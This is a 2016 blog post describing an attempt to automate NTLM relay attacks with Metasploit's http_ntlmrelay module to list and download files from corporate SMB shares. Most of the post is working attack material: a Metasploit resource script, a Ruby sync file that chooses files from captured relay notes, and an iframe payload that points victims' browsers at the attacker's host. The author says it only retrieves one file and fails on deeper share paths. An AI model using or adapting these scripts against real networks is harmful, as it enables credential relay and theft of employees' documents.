Sunday, July 24, 2016

Trying to automate the downloading of all files in a share using metasploit's http_ntlmrelay module with little recon.

Sorry for the long title. So I have been trying to automate the downloading of all files on a share using metasploit's http_ntlmrelay module. Here is the secinaro, you are on a network with file share servers that host employee's windows documents folder and authenticate using ntlm. Active Directory has anonymous read access, which you can use to find the address to the file server and path the user has access to. Assuming you have only one shot to get the loot I first use RTYPE SMB_LS, then use a sync file to parse the data and download the first file found using SMB_GET. I used a resource file to tie it all together, here is the code I used below.

resource.rb
use auxiliary/server/http_ntlmrelay
unset all
notes -d
set RHOST
set RPORT 445
set RTYPE SMB_LS
set RURIPATH
set URIPATH test1
run
set RTYPE SMB_GET
set SYNCFILE syncfile.rb
set URIPATH test2
run

syncfile.rb
print_status("looking for data...")
framework.db.notes.each do |note|
        if (note.ntype == 'ntlm_relay')
                for app in note.data[:Response]
                        p1 = app[1].to_s.split(",")
                        if (p1[0] == '{"type"=>"F"')
                                datastore['RURIPATH']=note.data[:RURI]+app[0]
                        end
                end
        end
        puts(datastore['RURIPATH'])
end

payload.html
[iframe src="http://kali:8080/test1"]
[iframe src="http://kali:8080/test2"]

The issues I'm having are, this method can only download one file at the moment and if the share's path goes deeper then one directory (i.e. path\to\share\) test1 does not authenticate properly and the attack fails. I have just started messing with the source code of the module but have not gotten anywhere yet. I will keep you posted if I figure anything out, if you have a solution please let me know! Thank you and enjoy.